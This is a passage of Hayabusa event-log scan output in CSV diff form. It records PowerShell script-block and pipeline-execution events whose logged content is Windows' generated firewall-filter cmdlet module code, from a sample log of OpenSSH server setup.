$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.250 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.251 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.252 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.253 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.253 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.299 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 